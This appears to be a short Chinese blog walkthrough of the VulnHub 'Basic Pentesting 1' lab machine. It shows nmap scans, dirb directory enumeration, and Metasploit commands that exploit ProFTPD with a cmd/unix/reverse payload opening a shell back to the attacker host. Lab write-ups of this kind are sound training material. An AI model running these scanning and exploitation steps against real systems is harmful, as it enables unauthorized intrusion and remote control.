Basic penetration_1靶机渗透

在这里插入图片描述

项目地址

```plain https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova ```

实验过程

开启靶机虚拟机

![](https://img-blog.csdnimg.cn/img_convert/4135d3c176bdca1f661f756b8321c97a.png)

使用nmap进行主机发现,获取靶机IP地址

```plain nmap 192.168.47.1-254 ```

根据对比可知Basic penetration:1的一个ip地址为192.168.47.168

扫描Basic penetration:1的操作系统,端口及对应服务

```plain nmap -A -p- 192.168.47.168 ```

发现该靶机开放了21,22,80端口

目录扫描

```plain dirb http://192.168.47.168 ```

信息收集

访问网站

发现是apache框架

提权

```plain msfconsole search ProFTPD ```

use 5
show options

set rhosts 192.168.47.168
set payload cmd/unix/reverse
set lhost 192.168.47.129
run

查看当前用户

提权成功
好小子,离成功又近一步!!!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值